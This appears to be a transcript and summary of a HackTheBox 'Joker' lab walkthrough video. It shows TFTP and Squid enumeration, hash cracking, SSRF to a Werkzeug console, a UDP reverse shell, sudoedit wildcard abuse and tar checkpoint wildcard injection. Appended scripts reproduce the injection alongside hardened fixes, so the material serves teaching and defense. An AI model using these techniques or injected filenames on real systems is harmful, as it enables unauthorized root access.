HackTheBox - Joker

IppSec · Intermediate · 🛠️ AI Tools & Apps · 8y ago

Key Takeaways

The video works through HackTheBox's Joker machine: nmap (TCP and UDP), pulling the Squid config and password file over TFTP, cracking the Apache APR MD5 hash with hashcat, using the authenticated Squid proxy (via FoxyProxy and a Burp upstream proxy) as an SSRF pivot to a localhost Werkzeug debug console, a UDP reverse shell because iptables drops inbound TCP, two sudoedit wildcard abuses to become the alekos user, and three routes from a root-owned backup cron job (symlink, tar --checkpoint, missing directory) to root.

Full Transcript

Hey guys, IppSec, and we're gonna be doing another video. This time it'll be Joker. This is my second-favorite box. It has a really cool privesc method that can be done a multitude of ways, and it gets its name because, well, Joker's wild: we use wildcards twice in the privesc. But before we get to the privesc we have to get a shell, so let's jump into the box.

So like every other box we have to start off with nmap: -sV to enumerate versions, -sC for safe scripts, -oA to output all formats, and the IP address of Joker, which is 10.10.10.21. I've already run this, no need to do it again, so let's just look at the results. We see two ports: 22, SSH, and 3128 for Squid. So no HTTP port like we're used to seeing, just Squid, which is an HTTP proxy. Since I don't think there's that much of an attack surface I'm going to run a few more nmaps and then do some enumeration. We do -p- to scan all ports, 1 through 65535. A lot of ports, it takes a long time, so we'll name this all-tcp, 10.10.10.21, and let this run. Let's just see if it finishes by the time this video finishes; I'm guessing it's not going to. We'll name this nmap all-tcp and open up a new one. We also want to nmap for UDP ports, so -sU for UDP, we'll name this udp, and 10.10.10.21. Not actually going to run this one because it takes some time to run; I already have the results and we'll review them in just a minute. But I want to keep poking at this Squid to see exactly what it is and make sure nmap is telling me the truth, so we're pretending I'm running that UDP nmap in the background while we're looking at this.

So we go to the IP and port and we get a generic error message, so we know it's an HTTP proxy. Let's configure a browser to use that: right click on my FoxyProxy, go to Options and New Proxy, and we'll specify the IP, which is 10.10.10.21, the port 3128, go to this General tab and we'll name it Joker Squid, click OK, close out, tell the browser to use this and just go to the IP. We get prompted for a username and password which we don't know. We try admin/admin because who knows, maybe it's the default, and it says that password doesn't work.

So let's go back and review our UDP nmap. That's called udp.nmap, and we see it is listening on port 69 and port 53. 69 is TFTP, so this will be where we want to start. And if you're super observant you'll notice my nmap version changed from like 7.5 to 6.4. The reason for this is when I do UDP or all-port scans I try to find a box on the HackTheBox network that has nmap installed and run it from there, because that means I won't send the nmap through my VPN, which is slow; it's just staying within the HackTheBox network and the scans go much, much faster. So a little tip there. I think I ran that one from Bank, since I just did the Bank video like two hours ago.

But let's begin looking at TFTP. So we tftp 10.10.10.21 and let's just try to get /etc/passwd: access violation. OK, get /etc/squid.cfg, not found. get /etc/squid.config, file not found. Oh, get /etc/squid doesn't return an error message. So if I just did /etc/etc, which I know doesn't exist: access violation. So we're getting somewhere; we know the /etc/squid directory exists. So get /etc/squid/squid.cfg, not found. get /etc/squid/squid.conf, and it hangs. So open up a new window and let's look: we have files, and squid.conf is one of them. Looks like we have downloaded the file. So we're gonna grep -v, do a caret to say at the beginning of the line, and then escape a hash, so we're gonna get rid of all lines that begin with this hash or pound sign. OK, now we need to grep for a dot to say hey, only give me lines that have content, and we get a good portion of that squid config. What we do see is auth_param basic, /etc/squid/passwords. So let's try getting this file: get /etc/squid/passwords, receives the file. cat passwords, and we do have a hash: calamari, and then $apr1$ and just the hash. So what I'm gonna do is send this over to my Kraken to crack the password. You can use John or any version of hashcat; I just have four GPUs, so I always use them when I get the chance.

So ssh into my box, the Kraken, cd hashcat, cd hashes, we just vi hashes/, we'll name this htb-squid, and we don't want to give it the username, we only want to give it the hash, so get rid of this. So before we crack this we have to figure out what type of hash it is. How I normally do this is just go to Google, disable the proxies, and do "hashcat example hashes", go to the first result, and we have a list of hash codes, the type of hash, and an example. I love having that example. So we just search for that dollar sign APR and we see the format here: it's an Apache APR MD5, so 1600 is what we need to know. You could have also done hashcat -h and grepped for APR and got it that way, but this doesn't give you the example hash, so I like having this example hash just so I know I'm feeding hashcat the way it was tested. So we do ./hashcat to execute it, -m 1600, the hash file, which is hashes/htb-squid, and then the wordlist. I have my wordlists in /opt/wordlists, who doesn't, and do rockyou to start. See it is initializing everything, and cracked: the password is ihateseafood. And the username was calamari, because we saw that; I erased it from that. So if we cat the passwords file again we see calamari:, so username/password is calamari / ihateseafood.

So now that we know the credentials let's go to FoxyProxy again, go to Options to edit our Squid proxy, and we can put the username, which was calamari, and the password is ihateseafood. Once I type that in again, for some reason: ihateseafood. And when we go to 10.10.10.21, if our proxy was enabled, we don't get prompted for a username anymore. We can also go to 127.0.0.1 and get a page. Looking at my Kali box, I can prove that I'm not listening on that because we see the only port I'm listening on is port 8080, which is my Burp. So what's happening is kind of like a server-side request forgery attack, that's SSRF, and this latest Black Hat, I think Black Hat 2017, the US edition, had a really good talk on server-side request forgery. Essentially what it's doing is saying hey, I go to a vulnerable web page and I make that page go to a URL, and when that page does it, it's already behind the firewall. So with Squid it's kind of like the same thing, except instead of a vulnerable page we're telling, hey Squid, you're running behind the firewall, go to 127.0.0.1, which is itself, and it accesses the page on its localhost. So maybe that makes sense, maybe it doesn't. If it doesn't make sense, look up server-side request forgery and I'm sure there'll be a good video on it.

So the first thing I'm gonna do now is disable FoxyProxy, because I don't like doing things through the browser, I like doing things through Burp. So we're gonna add an upstream proxy, and the destination host is going to be anything, proxy host is gonna be 10.10.10.21, the proxy port is gonna be 3128, authentication type is gonna be basic, calamari and ihateseafood. So now if I turn my FoxyProxy to use Burp I should get the same results, and I do. So if I intercept on... OK, so this Shorty application's not vulnerable; this is a false positive. What I did was go back into Burp, go to the Options tab, add a proxy listener, bind it to port, let's do 80, and redirect: redirect all those to 10.10.10.21 and redirect that to port 80. So now I have Burp listening on port 80 and everything it gets it sends to the proxy. And actually I think I need to redirect this to 127.0.0.1. So this looks really funny, but Burp's gonna know when it redirects it to redirect it through the proxy. Let's see if that's valid: curl 127.0.0.1, go to Burp, and that didn't work. See Options, request handling, enable invisible proxy. So I don't know why, but last time it said 10.10.10.21 when I did that GET. So let's try that one more time with invisible disabled, and maybe that actually did it, but I don't think that would do anything. So looking at the request we see GET 127.0.0.1. I swear the very first time I did this for some reason it said 10.10.10.21, so yeah, it's not invisible proxy. I don't know what went on, I'll go back and watch the video, but I swear Burp said 10.10.10.21. Let's do a history, tail 5. Cool, yeah, I've only called 127.0.0.1, so I don't know why I think Burp said that, but it did.

Anyways, what I'm going to do now is, I just realized I didn't clean up a wordlist, because we're going to use dirsearch just like we do in other videos. So /usr/share/wordlists/dirbuster, and I'm going to use the Bank video one because this has about a thousand lines, and we're going to just put in what I know is console; that's the web page we want to go to. So we'll do /opt/dirsearch; if you don't have this just Google "dirsearch github" and you should be able to find it and install it. So I'm gonna do that, dirsearch.py, wordlist is going to be /usr/share/dirbuster/bank. This is really funny; I would recommend if you didn't have anything just using this medium one, that generally has a lot of entries. And the -u for URL, so http://127.0.0.1. We need to do extensions with this, so we'll just do php, and threads, we'll do 20. So that's running, let's turn intercept off, and we see a hit immediately on console. So the reason I could do this again is because http://127.0.0.1 is going to Burp, which then forwards it to 127.0.0.1, but when it does the forward it's going through this proxy. Bit confusing, but hopefully you can follow that.

So we know /console and /list exist, and I don't actually know what /list is, so let's just see what that does. Guessing it's a list for the Shorty thing. Yeah. So if we go to /console we get a Python interactive console. Let's begin running Python commands. We're going to import os so we can do the popen command, which allows us to execute bash, and just do whoami to see what user we're running as, and then end that with a .read(), open and close parentheses. We see we are werkzeug, I guess, probably a bad pronunciation. The next thing I want to do is check which version of netcat is running. If I can just do the -e that'd be awesome; if not then I have to go to pentestmonkey to figure out the syntax, because I don't know it off the top of my head. That didn't return anything, so let's try redirecting standard error to standard out, because for some reason when we do -h or help flags it goes to standard error, not sure why. But yeah, so we see we're running the OpenBSD netcat, which means we do not have the -e flag. So go to pentestmonkey to do a reverse shell, just Googling "pentestmonkey reverse shell", scroll down. This Python one would be good, however we'd run into an issue, so we're just going to ignore that for now and do this netcat one; this says it works if you don't have the -e flag. So go back here, I'm gonna add an ampersand to the end of this so it goes in the background and doesn't hang, because if we ever hang a process then we have to revert the box because this web service dies. So we want to send it on port 8081, and we need to get my IP address, and I am 10.10.14.13. So listen here on 8081, run this, and we don't get anything. That's odd, this has always worked.

So the next thing to do is, I like doing tcpdump -i tun0 for ICMP; ICMP is generally allowed through firewalls, so we can just try a ping to see if that works, again leaving the ampersand there just in case the command never returns, so we don't hang. I do -c 4 to limit the amount of pings to four, and when we run this we see we're getting responses. So we do have a method to go from Joker to me, so that's good, but we don't have a way to go through TCP, which is weird. So the next thing we're gonna do is find the iptables config to see if we can read it. If we can read it then we can see what's going on and what protocols and ports we have access to, because maybe we can't send a shell on 8081 but we may be able to do 80 or 443, who knows. So we want to see what blocks us. So I'm going to find /etc and then grep for iptables, and we do see the rules are in iptables/rules.v4 and iptables/rules.v6. So I'm just gonna try to get these through TFTP first. So let's just go tftp 10.10.10.21, get, access violation. So we can't use TFTP to get them. And we could probably find a way to clean up our output when we're running these Python commands, because it's not doing line breaks, but one way I like doing things when I can only have one line is to use base64. So we do base64 -w0 to change my wrapping to zero; if I don't do this it tries putting the base64 on multiple lines, which is not good. And then the file name, which is iptables/rules.v4, and we can also, I think, do a space and do rules.v6 as well. I think base64 will accept two files. We'll find out. It does not, unless I made a typo. I don't have that .c because I'm an idiot, apparently. So that doesn't work. There we go, now we've got iptables v4. Copy this, go back to a shell, OK, we can do vi iptables-v4.b64, paste the contents, base64 -d to decode, and iptables-v4.b64, and we get the output. So we see the INPUT chain is set to DROP, so if we don't have a rule it drops it. So we're accepting port 22 for SSH, we're accepting 3128, which will be Squid, we're accepting UDP and accepting ICMP. So I guess we can do a UDP shell. The easiest way is to do what we just did with netcat and we add the -u flag for UDP. So we do nc -lvnpu 8081... nc -h, UDP, I thought it was -u, yeah, UDP mode. I guess it just wanted that as a separate flag, maybe. That was bizarre. So let's try this again, and we get a shell. Awesome.

So the next thing, like always: python -c 'import pty; pty.spawn("/bin/sh")' to get us a better TTY, and then we can background it, stty raw -echo, foreground with fg, and now we should be able to... we can tab autocomplete. That's odd. There we go, now we can tab autocomplete, awesome. clear, and clear works. Normally when I get the shell I would start running these scripts in this directory; it doesn't exist on your machine, just Google each of these, but these are all good privesc checking scripts: LinEnum, linuxprivchecker and unix-privesc-check. But that would make this video way too long, so I'm just gonna cheat. I know it's gonna be a sudo thing, so I just do sudo -l and we see that the user may run the following commands on Joker: as the alekos user, sudoedit /var/www/*/*/layout.html. "Joker's wild" now makes sense for the machine name, or at least Joker does. And the other thing I did on this, which is kind of a hint, is if we do a dpkg -l for sudo we see the version of sudo is 1.8.16. So searchsploit sudoedit, and we see an exploit for 1.8.14. I went down this rabbit hole, realized it wasn't this, realized it was involved, but turns out it is. There's two ways to do this; I'll show you both. This is the intended way. So if we look at this we see "it seems that sudoedit does not check the full path if wildcard is used twice." Does this look familiar? It should, because this looks almost exactly like what we just saw. And then down below it says if you create a symbolic link it kind of follows it. So if you have two wildcards you can do a symlink, and when you do that you can edit files that you're not supposed to. So we can demo that, but first I want to show why this is vulnerable, because it says 1.8.14 and we're clearly beyond that. So if we Google this it's going to go to the sudoers manual, and we can see what these flags are. This sudoedit_checkdir, you can read it if you want, that's not really applicable here; we want to check this sudoedit_follow. Oh my god, don't tell me I went to the wrong directory... page. We want the manual, and we can see the sudoedit_follow was introduced in 1.8.15. So when they fixed 1.8.14 it's like, you know what, I guess there are times when people want to use sudoedit against symlinks, so if they want to we'll create this flag for them, the sudoedit_follow flag. So that's why the flag exists in 1.8.15: because they patched the CVE, and if you wanted that functionality, enable this flag. So that's how we're still able to abuse this CVE.

So if we go into the testing directory... so we're in /var/www, we're in this /*, so we want to create a new one, so we're gonna mkdir ippsec. So now /ippsec, so now we've satisfied both of these wildcards, so we can just do an ln -s to create a symbolic link, and we do /home/alekos/.ssh/authorized_keys. We should be able to edit this file. So the symbolic link is created. We don't have the ability... no, no, it's not created, we have to name this layout.html. So now if we cat layout.html: no file, /home/alekos... did I make a typo? I don't think I did. The file doesn't exist yet, that's fine. So if we try to write to that file we probably can't: permission denied. OK, that's more what I was expecting. So let's do the sudoedit -u alekos /var/www/, what was it, testing/ippsec/layout.html. Man, that's annoying. And we get a nano. So let's do on this box ssh-keygen to create an SSH key. We want to create it in /root/Documents/htb/joker/ssh_key, I guess, no passphrase, and we created the key. So now we can cat ssh_key.pub, and if we copy this into the authorized_keys file, if we have the private key we can SSH to it, and since we generated it we do have the private key. Hit Ctrl-X to save, save modified buffer, yes. And if we cat authorized_keys we now see we modified it, because we were the alekos user via sudoedit. So if we go to the Joker box, ssh -i ssh_key alekos@10.10.10.21, we get in, we have SSH.

But you probably wanted to see the other way to do this. The other way isn't through a CVE, and it wasn't intended, and it's my favorite way; this is how I did it the first time. So sudo... let's see, I probably want to have more lines. Yeah, so I don't like how this is doing that weird wrap, so let's see, echo $COLUMNS, 80, over here, echo $COLUMNS, 188, so if I do export COLUMNS=188, no. Oh, I thought that would do that. export TERM=screen, OK, I'm not sure. So how I'm gonna do this is we'll just do this in a different window and then copy and paste, that should be fun. So let's split my window, sudo -l, go down. So here I'm going to go into /home/alekos, since I can go in his home directory. So the key thing here for this exploit is we're taking advantage by setting our current working directory, and this will make more sense in just a second. So we do sudoedit -u alekos and then we're going to do /var/www/, so this piece is now satisfied. With the wildcard we can do whatever we want, so I can do a space, then I can do .ssh, and we satisfied this wildcard now. So if I do a /authorized_keys we satisfy that slash and this wildcard. If I do another space, layout/layout.html, I now have satisfied this whole thing, and nano gets three parameters: it edits three different files. So if we copy this, go up here, paste, we get in as well. When we hit Ctrl-X to close it wants us to edit another file; just exit again, and we see it did sudoedit against two files. So that was that way to do the box.

So what's left is getting root. The trick to getting root is the backup folder. So we look into backup and get a permission denied, because I'm going through netcat, not SSH. So remember when I did the authorized_keys file the very first time and logged in? This is that session. So if I do a whoami here I see I am alekos, if this actually returns. There we go. And going to my netcat, whoami: werkzeug. So go to my SSH and we should be able to go into backups and do ls -la. We can see that a backup is being created every five minutes on the dot and they are owned by root. That is odd. So let's look at what's in a backup. So we do tar xzvf... probably quicker to just copy and paste. Not in gzip? Oh, what is the flag for... is it j for bz2? Let's just man tar, blank, OK, these are tough. Not gzip; the .gz is a lie, that's weird. So tar xvf that, /dev. So we can see it is just backing up what is in the development folder every five minutes. It looks like someone else has been on this machine. Can I delete these files? Yes I can. So this is what it should look like. Look at the date: so it just did a backup, so we have about five minutes until the next one runs.

So since it's doing a backup every five minutes, the very first thing we'll do is the first way: so we can archive off this development folder and then ln -s, I think, /root development. So what I did there is created a symbolic link to development, and when it follows... hold on, explaining is hard sometimes. So when the tar goes to archive or back up development, the symbolic link is directing it to /root. So in five minutes we should be able to go to backup and see the contents of the root directory. You could also do that with like /etc and get the shadow file and then crack the password. There's another way to get command execution, but it'll probably take more than five minutes to explain, so while that's running in the background, let's explain. When you do a wildcard... and this machine's going really slow... it's not just passing the wildcard to the binary. What the wildcard is doing is essentially an ls of the directory, and it's passing all of these as arguments to this binary. So if one of these files was an argument, it will pass that to the binary, if that makes sense. So we do ls * and it just does ls like that. So if we did touch -la and do ls *, now it passes that -la to ls and we changed the command. Does that make sense? Hopefully it does. So again ls *, but when we do the star it's executing -la. You can also see there's no -la here, because it wasn't treated as a file, it was treated as an argument. So that's the danger of wildcards, and what you should take away from this box. And notice when I removed the -la I put a ./ in front of it so it didn't treat that as an argument.

So if we go to, I think it's DefenseCode, yeah, wildcard, this blog post talks about it. So you can just Google "DefenseCode wildcard" and find it, but it talks about chown, tar, this --checkpoint, and what it's doing is actually allowing you to execute a script from a tar argument. So let's see, has it been five minutes yet? No, we've got two minutes. So we're going to touch -- --, what was it, checkpoint=1. I know, my connection is going so slow. So what this -- is doing is actually just saying, hey, there's gonna be no arguments after this. So if I just did like touch --checkpoint=1 it's probably going to say I have no idea what you're trying to do. Yeah, unrecognized option; it doesn't know what that argument is. So this -- says hey, this isn't gonna be an argument, this is gonna be a file, create it, and we see that --checkpoint has been created. The next file we want to create has got a space in it, so I'm going to do a single quote, I'm gonna do --checkpoint-action=exec=sh, then do ./, no, they just did shell, so shell.sh. So we do ls here and we see we have both of these created. The next thing we have to do is actually create the shell.sh file. I don't have vi, so vim, and we can go back to this, copy over the shell we used earlier. And whenever you see me doing the paste and it's not working and then I do paste again without copying, it's because I'm hitting Ctrl-Shift-Insert, and you have multiple clipboards on your computer, so Ctrl-Shift-Insert and Shift-Insert are different clipboards, if that makes sense, and you'll get different results. Ah, I can't do dd to delete a line. OK, so let's see, we can make these separate lines, that looks fine. So we're gonna write shell.sh. The other thing I'm gonna do is run sed against this and we're going to change /tmp/f to /tmp/i, so we can see that's changed, it looks fine, and then -i. The reason I'm doing that is because /tmp/f already existed and I'm using it for this shell, so I just didn't want to step on myself. And if we... oh no, oh no, tmux. I don't know how to resume tmux, and I minimized tmux. There we go, awesome, so we are back in. Whoo, that was scary. So where was I? Let's go back up. That's definitely good, five minutes now. So do ls, we can move this dev, this one, the latest one, to extract, and then tar xvf dev, and we get root.txt. So that's one way to do it, but we wanted to get an actual shell.

So let's see what time it is; we have one and a half minutes. So go back one more directory. Oh, we can just delete that, and then we can move our development back to development. So when it does that tar, it's going to run this checkpoint and then this checkpoint action and this shell.sh. So let's look at this: 10.10.14.13, ifconfig, I'm still that IP. So nc -lvnp 8082 -u, do I have that set there? I do not, so let's change this. I don't have vi. Is it there? Can I not read? cat shell.sh... whoever... that's bloody confusing. So it's using shell.sh, so let's just cp test.sh shell.sh, OK, and I missed the window. Oh my god, that sucks. So we gotta wait five minutes. I want to stop the video and then pick it back up so you're not sitting here waiting and watching me wait five minutes.

So it's been a few minutes, and while this is going let's just examine what that backup.sh was doing, or the backup script. So we see it doing a cd /home/alekos/development, then it's doing a tar, there's the wildcard, and then chowning the backup and then exiting. So I bet... oh no, never mind. I was thinking if we deleted the development folder then the tar may just back up the way it is, but no, no, no, it will. Yeah, we'll do that next: we're gonna delete this development folder and then see exactly what gets backed up; it should be the current working directory of root. So there's gonna be three different ways you can get root, or get the root.txt. Look at the date though; we got about one minute left until the netcat session, so hopefully this one will work. development, so we're gonna do checkpoint 1, it's going to do that. We'll just chmod +x on shell.sh. Let's do a netcat on -u, that's fine, my netcat is -u and 8082, everything's fine. So in 30 seconds I should get a shell. So let's see, when that sleep is finished I will have a shell. Come on. I should have done a for loop and did like a fancy countdown, maybe. The time always goes slower when you are watching it. And I did not get a shell, so I screwed something up. Oh, nope, there we go, got it. So I am root, awesome.

So there's another way, and then the final way we're going to do this is simply just moving this development folder and not doing a symlink. So mv development to development.bak, and we're gonna wait five minutes. So again gonna stop the video and do a new one so I can splice this third privesc in, because I don't want to just sit around and have you wait for my commands to finish, because this takes forever, four minutes. Yeah, so we're almost there, we got about 30 seconds left until the cron runs, and we'll see if anything happened. So let's go back into the backup folder, do ls -la, and we see the last one's failed because we're doing the reverse shell, I'm guessing. So we should get one more file and we'll see what happens if you delete the development folder. A backup, and it's just about the same size as when we did the symlinks, so I would guess that we got the flag. It's not what I wanted... tar xvf, and yes, we got it. So again, what happened was this script runs every 5 minutes and it did a cd /home/alekos/development. This cd failed because development did not exist, so cd failed and it never changed directories, and then it runs our command: tar cf /home/alekos/backup/, file name, this is the backup name, and then just *, which says hey, back up everything in my directory. So that was the third way to get the root flag. I hope that makes sense. Hope you guys enjoyed this video, I know this was a bit all over the place, and I just realized I didn't hide that bar up the top when I resumed. Oh well, take care, I'll see you guys in probably a week when the next box retires.

Actually, one last thing I remembered just as I was about to shut down my PC: we have an nmap going that I want to look at. So let's see if that all finished. It has not; it has been going. I took a break in the middle of this video, but seven hours, no, seven hours 51 minutes remaining, and I started this three hours ago. So that is how long this -p- takes. I didn't even specify any extra flags or anything, so that is long; that is a long time for nmap, and that's why I generally sneak onto another box to run it. So yep, I hope you guys enjoyed. Peace.
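Both sudoedit routes in the video succeed against the same sudoers line, `sudoedit /var/www/*/*/layout.html`, and it helps to see why with something you can run. The shell script below is an added example (mine, not the video's commands and not sudo's source). It assumes, from my reading of sudo's match.c, that sudo joins the command arguments with single spaces and compares that string to the sudoers argument pattern with fnmatch(3) and no flags, so `*` also matches `/` and spaces; a POSIX `case` pattern has the same semantics, which is what `sudoers_args_match` relies on. The second function rebuilds the intended route's symlink layout under a mktemp directory (paths and the `ippsec` directory name are constructed here, nothing touches the real /var/www) and checks whether the link resolves outside the www tree, which is the decision `sudoedit_follow` (off by default since sudo 1.8.15) makes.

```sh
#!/bin/sh
# Added example: model of sudo's argument matching for the Joker sudoers rule
#   alekos may run: sudoedit /var/www/*/*/layout.html
# Assumption (from sudo's match.c as I read it): argv is joined with single
# spaces and fnmatch()ed against the pattern with no flags, so '*' crosses
# '/' and ' '. An unquoted sh case pattern matches the same way.

RULE='/var/www/*/*/layout.html'

# sudoers_args_match PATTERN ARG... -> 0 if the rule would accept these args
sudoers_args_match() {
    pattern=$1; shift
    joined="$*"                  # argv joined by single spaces, as sudo does
    case "$joined" in
        $pattern) return 0 ;;    # unquoted: the expanded value is the glob
        *)        return 1 ;;
    esac
}

# Route 1 (intended): one real path under two directories, which is a symlink.
# Route 2 (unintended): three arguments whose joined form also matches, since
# '*' swallows " .ssh" and "authorized_keys layout". A literal path in sudoers
# (no wildcards) rejects both; leaving sudoedit_follow off also stops route 1.
demo_matches() {
    sudoers_args_match "$RULE" /var/www/testing/ippsec/layout.html && \
    sudoers_args_match "$RULE" /var/www/ .ssh/authorized_keys layout/layout.html && \
    ! sudoers_args_match "$RULE" /home/alekos/.ssh/authorized_keys && \
    ! sudoers_args_match "$RULE" /var/www/layout.html
}

# symlink_escapes_root -> 0 if the route-1 symlink resolves outside the www
# tree. Constructed layout under mktemp; the real filesystem is not touched.
symlink_escapes_root() {
    work=$(mktemp -d) || return 2
    www="$work/var/www"
    keys="$work/home/alekos/.ssh/authorized_keys"
    mkdir -p "$www/testing/ippsec" "${keys%/*}"
    : > "$keys"
    ln -s "$keys" "$www/testing/ippsec/layout.html"
    www_real=$(readlink -f "$www")
    target=$(readlink -f "$www/testing/ippsec/layout.html")
    case "$target" in
        "$www_real"/*) rc=1 ;;   # stays inside /var/www: following is harmless
        *)             rc=0 ;;   # escapes: this is what sudoedit_follow=off blocks
    esac
    rm -rf "$work"
    return $rc
}

# Usage when run as a script.
demo_matches && echo "glob model: both routes match the rule, the controls do not"
symlink_escapes_root && echo "route-1 symlink resolves outside the www tree"
```

The takeaway for a sudoers author is the same one the video reaches: a wildcard in a sudoedit path is matched as a glob, not as a path component, so write the full literal path and keep `sudoedit_follow` disabled.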

Original Description

00:27 - Port Enumeration
02:54 - UDP Port Review
03:40 - TFTP Enumeration
06:30 - Cracking Squid PW
08:00 - FoxyProxy Setup
09:45 - Burp Setup
14:45 - Running Commands
21:20 - Reverse Shell
22:30 - PrivEsc to Alekos #1
28:00 - PrivEsc to Alekos #2
30:37 - Root #1 (SymLink)
30:48 - Root #2 (Tar Checkpoint)
44:45 - Root #3 (Remove Development)


This video walks through HackTheBox's Joker machine with nmap, TFTP, Squid and Burp Suite to reach a Werkzeug debug console that is only exposed on localhost, then escalates to the alekos user through sudoedit wildcard abuse and to root through a cron job that runs tar with a shell wildcard. The lesson covers TCP and UDP scanning, password cracking, server-side request forgery through an HTTP proxy, firewall-aware reverse shells, and wildcard injection.

Key Takeaways
  1. Run an nmap UDP scan as well as the TCP scan; TFTP on UDP/69 is the foothold
  2. Configure a browser (FoxyProxy) to use the Squid proxy on port 3128
  3. Use TFTP error messages to confirm /etc/squid exists, then fetch squid.conf
  4. Read the auth_param line in squid.conf to locate /etc/squid/passwords
  5. Extract the $apr1$ (Apache APR MD5) hash from the passwords file
  6. Crack it with hashcat -m 1600 and rockyou
  7. Configure Burp to use Squid as an upstream proxy with basic authentication
  8. Add a Burp listener that redirects to 127.0.0.1 so directory brute-forcing reaches the proxy's localhost (SSRF through Squid)
  9. Because iptables drops inbound TCP but accepts UDP, use a UDP netcat reverse shell
  10. Escalate to alekos via the sudoedit double-wildcard rule, then to root via the backup folder owned by root and its tar wildcard cron job
💡 The point the video keeps returning to is wildcard expansion: a sudoers glob and tar's `*` both turn attacker-controlled names into arguments, so pin sudoers paths to literals and put `--` (or `./`) before globs in privileged scripts.
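The three root routes all come from the backup cron job running `tar` against a shell wildcard. The script below is an added example (mine, not the video's backup.sh) that models that job in a temp directory and reproduces two of the routes: Root #2, where files named `--checkpoint=1` and `--checkpoint-action=exec=sh shell.sh` turn the expanded glob into tar options, and Root #3, where an unchecked `cd` to a missing directory leaves tar archiving the caller's working directory. Beside it is the fixed form, which aborts when `cd` fails and ends option parsing with `--` before the glob. It assumes GNU tar (for `--checkpoint`); the `development` layout, `app.py`, `root.txt` and the `pwned` marker file are constructed here.

```sh
#!/bin/sh
# Added example: tar wildcard injection, modelled on Joker's root backup cron.
# Assumes GNU tar; everything is created under a mktemp directory.

# The cron job as the video describes it: cd (result ignored), then tar *.
vulnerable_backup() {             # $1 = development dir, $2 = archive path
    ( cd "$1"; tar cf "$2" * ) 2>/dev/null
}

# Fixed form: stop if cd fails, and put -- before the glob so attacker-named
# files are archived as files instead of being parsed as options.
hardened_backup() {
    ( cd "$1" && tar cf "$2" -- * ) 2>/dev/null
}

# Plant what an attacker with write access to the dev dir would drop. The
# payload only creates a marker file so the harness can tell it executed.
plant_payload() {                 # $1 = development dir, $2 = marker path
    printf '#!/bin/sh\ntouch "%s"\n' "$2" > "$1/shell.sh"
    touch -- "$1/--checkpoint=1"
    touch -- "$1/--checkpoint-action=exec=sh shell.sh"
}

# checkpoint_route BACKUP_FN -> 0 if the payload ran during the backup
checkpoint_route() {
    work=$(mktemp -d) || return 2
    mkdir "$work/development"
    echo 'print("hello")' > "$work/development/app.py"   # constructed content
    plant_payload "$work/development" "$work/pwned"
    "$1" "$work/development" "$work/backup.tar"
    if [ -e "$work/pwned" ]; then rc=0; else rc=1; fi
    rm -rf "$work"
    return $rc
}

# missing_dir_route BACKUP_FN -> 0 if, with development/ absent, the archive
# captured the caller's cwd (standing in for /root) rather than nothing
missing_dir_route() {
    work=$(mktemp -d) || return 2
    mkdir "$work/roothome"
    echo 'flag{constructed}' > "$work/roothome/root.txt"
    ( cd "$work/roothome" && "$1" "$work/development" "$work/backup.tar" )
    if [ -f "$work/backup.tar" ] && tar tf "$work/backup.tar" | grep -qx 'root.txt'
    then rc=0; else rc=1; fi
    rm -rf "$work"
    return $rc
}

# Usage when run as a script: each route against the job and against the fix.
checkpoint_route vulnerable_backup  && echo "root #2: payload executed via tar *"
checkpoint_route hardened_backup    || echo "root #2 blocked by tar -- *"
missing_dir_route vulnerable_backup && echo "root #3: cd failed, cwd was archived"
missing_dir_route hardened_backup   || echo "root #3 blocked by cd ... &&"
```

Two details matter for detection and hardening: the checkpoint action runs `sh -c` with tar's working directory, so a payload only needs a relative name, and `--` is the only reliable guard because GNU tar permutes options, so it does not matter where in the glob expansion the option-shaped filename lands.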
